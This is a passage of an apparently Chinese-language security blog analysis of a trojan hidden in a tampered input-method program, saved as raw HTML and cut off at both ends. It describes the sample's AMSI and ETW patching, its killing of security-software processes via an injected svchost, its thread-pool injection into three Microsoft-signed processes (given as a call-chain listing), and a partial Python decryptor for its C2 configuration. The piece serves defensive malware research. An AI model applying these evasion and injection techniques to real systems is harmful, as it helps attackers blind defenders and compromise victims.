4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dxyvnb.ti</span></code><span leaf=""> 两个载荷写入 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VSSVC.exe</span></code><span leaf="">。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="146" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">六、注入 VSSVC 后的三重对抗</span></h2><h3 data-line="148" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.1 AMSI 双函数 Patch</span></h3><p data-line="150" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dxyvnb.ti</span></code><span leaf=""> 负责 AMSI 扫描绕过。样本通过 12 字节 PATCH，将 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">amsi.dll</span></code><span leaf=""> 中的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">AmsiScanBuffer</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">AmsiScanString</span></code><span leaf=""> 首部改写为返回安全结果（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">S_OK + AMSI_RESULT_CLEAN</span></code><span leaf="">）的短桩代码。后续扫描请求在交给杀软 Provider 前就被截断。<img class="rich_pages wxw-img" data-ratio="0.3502994011976048" data-type="png" data-w="668" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028182" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=7136ede5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWEavC1cLpJuzgXcW41hNTQZG5jDyeDq3g4TJQZINTffuZSMeWkDm11H9Y4iaI1HWAx4geDdgj4p7D8IehyUaZCibDh7RfJ4AYFM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><img class="rich_pages wxw-img" data-ratio="0.3843843843843844" data-type="png" data-w="666" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028181" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=0c8e3483&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVGXHQPOo4EdvuvTW15DicEOWRiaMte5hfSxsjK9lQNjgn6UBickzFGZwYuKMRYzI3Gziaqu7yEHyPibCDIcP3IROlhAAlml17Zakrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.4262295081967213" data-s="300,640" data-type="jpeg" data-w="549" style="width: 546px;height: auto !important;" type="block" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwX0aqX9CRwpcEmy6qMCBo2JPEPX9qss1icNHFuoLRWjTABZvCn10CRkx5JmWgS2VBEDmibttuTkRmwbKBh2giaC7gYKAKX9TA6cjc/640?wx_fmt=png&amp;from=appmsg" data-cropx1="2.0181488203266786" data-cropx2="551.9637023593466" data-cropy1="5.045372050816697" data-cropy2="240.15970961887476" data-imgfileid="100028193" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=dbc25847&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwXvmWopVSBRA967yzFD3ED5saBOpmLRl9zrt0g6Yg8sJ5Z80BBicL41wl5UzfFJZsOiaicIUOZy2oPY7YHZ6CuTke0FRjqqgUd5No%2F640%3Fwx_fmt%3Djpeg"/></p><h3 data-line="159" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.2 ETW 单字节致盲</span></h3><p data-line="161" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">针对微软 ETW 遥测框架，样本只改写 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ntdll!EtwEventWrite</span></code><span leaf=""> 入口的第一个字节为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xC3</span></code><span leaf="">（ret）。这一字节 PATCH 会让进程内所有 ETW 事件，包括 Defender 的 AMSI 子通道、PowerShell ScriptBlock 日志、.NET CLR 运行时遥测等，在离开进程前被静默丢弃。下游依赖 ETW Consumer 的 EDR 分析链路也会随之失效。<img class="rich_pages wxw-img" data-ratio="0.4846029173419773" data-type="png" data-w="617" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028185" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=bf4eb223&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUyicyT84r33t9mSSIZlx3PHHa0AJrQ0DOfvo2FPDovOA7UsXQZglVejXrLYUv4uWsTzpIVCL0iaAeILTtvZPHjJIWJbSefrMbm4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h3 data-line="164" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.3 注入 svchost 并围剿国内安全软件</span></h3><p data-line="166" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">yinma.vc</span></code><span leaf=""> 解密展开为标准 PE 后，会读取外部 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ntrin.er</span></code><span leaf=""> 恶意载荷，再次通过线程池注入将其写入系统中 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PID 最小的 svchost.exe</span></strong><span leaf=""> 进程。</span></p><p data-line="168" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这个目标选择并不随机。PID 最小的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">svchost.exe</span></code><span leaf=""> 通常对应 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">-k DcomLaunch</span></code><span leaf=""> 或 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">-k RPCSS</span></code><span leaf="">，权限为 SYSTEM，并运行在敏感服务组内。攻击者借它作为执行进程，在应用层结束国内安全软件时成功率更高。</span></p><p data-line="170" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">被注入的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">svchost.exe</span></code><span leaf=""> 会启动监控线程，按照运行时解密出的硬编码字符串表循环探测，并主动结束对应安全软件进程：<img class="rich_pages wxw-img" data-ratio="1.3407407407407408" data-s="300,640" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwVj3oyZZxJuhnuxFBwpia4GSU5pklhuB1ejNZRa5pBicRLVbNwDKyzkibfnyAFORmP3AgXxKRHBT5X38wzqY7tuiaoGgeMhkwzXUAw/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="711" data-imgfileid="100028240" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=4d553bae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVj3oyZZxJuhnuxFBwpia4GSU5pklhuB1ejNZRa5pBicRLVbNwDKyzkibfnyAFORmP3AgXxKRHBT5X38wzqY7tuiaoGgeMhkwzXUAw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="184" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">七、fhkan 模块：三件套注入 + Mutex 门控</span></h2><p data-line="186" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ev2c34.exe</span></code><span leaf="">（篡改自万能输入法）运行后，先解密装载 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fhkan.oi</span></code><span leaf="">，再调用其中的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">AndStop</span></code><span leaf=""> 函数。该函数承担本轮攻击的主业务调度职责，核心逻辑包括：</span></p><h3 data-line="188" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">7.1 Mutex 单实例守卫 + C2 上线标记</span></h3><p data-line="190" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fhkan</span></code><span leaf=""> 使用两个 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Base64 编码的 Mutex</span></strong><span leaf=""> 作为状态位，分别表示“已上线”和“本地守卫正在运行”。下图是 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">UserAccountBroker.exe</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">edpnotify.exe</span></code><span leaf=""> 持有的 Mutex：<img class="rich_pages wxw-img" data-ratio="0.26481481481481484" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028188" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=a0be3754&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwU8mKvnawJcxQgwJBDHGhW80DCM8G7z4vCoGYZEM6myMwfBluPXLo9zrjicA2R9uwvuwCE9F9ngJ4LxghhsyvotyibiavSrufqeyM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.3333333333333333" data-s="300,640" data-type="jpeg" data-w="549" style="width: 546px;height: auto !important;" type="block" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwVVcibERVByJSGMJTzQbrTBfMsAicibFpGnYH1tyFiabbQKuMgiaZoOVPn7mTcXk2LcnOJxwYW4pVicMsbiaMmlcpB0ZPF3ohmvAl1W9I/640?wx_fmt=png&amp;from=appmsg" data-cropx1="1.0183150183150182" data-cropx2="550.9084249084249" data-cropy1="6.109890109890111" data-cropy2="190.42490842490847" data-imgfileid="100028194" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=b32ededc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWUKbIWmwcNBasj9SmKmOG0OEdvJRkzbEOnHADsY7cVrbWkPNiaxsJZTfWfVJIqyO3GnJY8IvmhtS7bbmfDxwJYO1W9NMSy17fQ%2F640%3Fwx_fmt%3Djpeg"/></p><p data-line="199" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fhkan</span></code><span leaf=""> 启动时会首先检查这两个 Mutex：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">都不存在 → 进入</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">主分支</span></strong><span leaf="">，执行跨进程注入；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">已存在 → 说明木马已经在运行，当前实例直接退出，避免重复感染。</span></p></li></ul><h3 data-line="204" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">7.2 注入“微软签名 Shell 三件套”</span></h3><p data-line="206" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fhkan</span></code><span leaf=""> 完成自解密后，会注入三个微软原生签名的用户态 Shell 进程，构建冗余且隐蔽的 C2 宿主：</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwW2NSKuCqUCqubbv1iadVI6bcweRm3FQnZExc1IPeXFSua2vjwqVo38wCQSf00c7gaibj8xqe7lMsMVDjs09lDTMNesP36U4P2Sk/640?wx_fmt=png&amp;from=appmsg" data-cropx1="3" data-cropx2="545" data-cropy1="9" data-cropy2="265" data-imgfileid="100028197" data-ratio="0.4714548802946593" data-s="300,640" data-type="jpeg" data-w="543" style="width: 546px;height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bd5848b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwWNuycjENLkCCUicfQQSrRQ7J3dRJ8sY0SPsHibpPwrPjIT3VRIliasfOuhqJuvFN4OsbbZVVoVnE4YeMMe2F47qOqNWgNam4exsI%2F640%3Fwx_fmt%3Djpeg"/></p><p data-line="214" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这三个进程都有适合驻留的特征：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">三者均为微软签名，更容易被 EDR 或杀软默认放行出站连接；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">三者均为系统功能模块，分别承担 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Shell 基础设施（sihost）</span></strong><span leaf="">、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">用户账户代理（UserAccountBroker）</span></strong><span leaf="">、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">企业数据保护通知（EDPNotify）</span></strong><span leaf=""> 三类系统职责，隐蔽性更高；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">三者同时感染，用户手动 kill 其中一个，其余两个仍可能维持 C2 活性，具备明显的冗余备份特征。</span></p></li></ul><h3 data-line="220" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">7.3 注入手法：ThreadPool IO 触发</span></h3><p data-line="222" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fhkan</span></code><span leaf=""> 使用线程池 IO 完成回调触发远程载荷，而不是传统的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateRemoteThread</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">QueueUserAPC</span></code><span leaf="">。这种方式避开了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateRemoteThread</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">NtCreateThreadEx</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SetThreadContext</span></code><span leaf=""> 等经典进程注入监控点。从 EDR 视角看，它更像一次普通的线程池 IO 调度，调用栈也更干净：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">OpenProcess</span></span><span leaf="">(target_pid, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x448</span></span><span leaf="">)                     </span><span style="color: rgb(115, 129, 145);"><span leaf="">// VM_OPERATION|DUP_HANDLE|QUERY_LIMITED</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">NtCreateSection</span></span><span leaf="">(</span><span style="color: rgb(76, 129, 201);"><span leaf="">0xf001f</span></span><span leaf="">)                           </span><span style="color: rgb(115, 129, 145);"><span leaf="">// SECTION_ALL_ACCESS</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">NtMapViewOfSection</span></span><span leaf="">(section, </span><span style="color: rgb(0, 72, 171);"><span leaf="">self</span></span><span leaf="">)                  </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 本地映射，写入 payload</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">NtMapViewOfSection</span></span><span leaf="">(section, remote_target)  ★核心   </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 跨进程映射 → payload 已在目标地址空间</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">NtUnmapViewOfSection</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">self</span></span><span leaf="">)                         </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 释放本地映射（保留远程）</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">CreateFileW</span></span><span leaf="">(uk_tmp.txt)                            </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 创建触发信号文件</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">     ↓</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">TpAllocIoCompletion + </span><span style="color: rgb(0, 72, 171);"><span leaf="">CreateThreadpoolIo</span></span><span leaf="">(cb=远程地址)</span></p></code></pre></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="243" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">八、C2 配置与解密算法</span></h2><p data-line="245" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">核心配置保存在本地 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ap.asin</span></code><span leaf=""> 文件中，大小仅 260 字节。该文件在运行时被加载到内存，并通过线性同余 XOR 算法解密。下图为动态调试时在内存中捕获到的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ap.asin</span></code><span leaf=""> 解密结构：<img class="rich_pages wxw-img" data-ratio="0.5175925925925926" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028187" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=8071ed89&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwU7hb0wtbnuPwCBJ3kN7TDqB1lp2ZicibPv6PkPUkrA5alicW3JWOwrBD8bicPBs7LHV4rZl9dNiaHheIJpjWsPogpLNWQ3ibAFBtsZ8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="249" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">还原后的解密算法如下：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">def</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">decrypt</span></span><span leaf="">(</span><span leaf="">data: </span><span style="color: rgb(0, 72, 171);"><span leaf="">bytes</span></span><span leaf="">, A: </span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x27</span></span><span leaf="">, B: </span><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x5A</span></span><span leaf="">) -&gt; </span><span style="color: rgb(0, 72, 171);"><span leaf="">bytes</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    result = </span><span style="color: rgb(0, 72, 171);"><span leaf="">bytearray</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">len</span></span><span leaf="">(data))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> i </span><span style="color: rgb(0, 72, 171);"><span 